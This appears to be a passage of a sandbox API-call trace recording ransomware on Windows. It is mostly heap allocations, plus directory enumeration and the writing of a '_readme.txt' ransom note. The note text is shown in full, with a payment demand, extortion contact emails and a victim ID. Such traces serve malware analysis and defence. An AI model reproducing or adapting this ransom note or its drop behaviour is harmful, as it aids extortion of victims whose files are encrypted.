[0209.821] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.821] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.821] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.821] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.821] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.821] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.821] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.821] PathFindFileNameW (pszPath="C:\\Boot\\pt-PT\\") returned="pt-PT\\" [0209.821] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0209.821] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.821] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.821] PathFindFileNameW (pszPath="") returned="" [0209.821] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.822] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.822] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.822] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.822] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.822] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.822] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.822] PathAppendW (in: pszPath="C:\\Boot\\pt-PT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0209.822] PathFileExistsW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 0 [0209.822] lstrcpyW (in: lpString1=0x3a87060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.823] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.823] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\_readme.txt" (normalized: "c:\\boot\\pt-pt\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.823] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32da538 | out: hHeap=0x750000) returned 1 [0209.823] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a87060 | out: hHeap=0x750000) returned 1 [0209.823] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.823] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.824] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.824] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.824] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0209.824] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0209.824] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.824] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.824] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286440 | out: hHeap=0x750000) returned 1 [0209.824] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286440 [0209.824] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.824] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.824] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.824] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.824] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.824] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.824] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.824] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.824] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.824] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.824] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.824] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.824] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.824] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.825] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.825] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.825] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.825] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.825] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.825] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.825] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.825] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.825] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.825] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.825] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.825] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.825] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.825] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.825] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.825] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.825] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.825] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.825] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.825] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.825] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.825] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.825] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.825] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.825] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.825] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.825] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.825] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.825] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.826] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.826] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.826] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.826] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.826] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.826] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.826] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.826] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.826] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.826] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.826] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.826] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.826] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.826] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.826] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.826] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.826] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.826] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.826] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.826] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.826] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.826] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.826] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.826] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.826] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.827] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.827] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.827] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.827] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.827] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.827] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.827] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.827] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.827] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.827] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.827] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.827] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.827] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.827] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.827] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.827] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.827] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.827] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.827] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.827] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.827] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.827] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.827] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.827] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.827] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.827] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.828] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.828] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.828] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.828] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.828] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.828] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.828] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.828] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.828] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.828] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.828] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.828] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.828] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.828] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.828] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.828] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.828] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.828] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.828] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.828] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.828] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.828] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.828] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.828] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.828] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.828] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.829] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.829] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.829] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.829] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.829] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.829] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.829] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.829] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.829] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.829] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.829] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.829] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.829] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.829] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.829] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.829] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.829] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.829] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.829] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.829] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.829] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.829] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.829] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.829] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.829] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.830] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.830] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.830] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.830] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.830] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.830] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 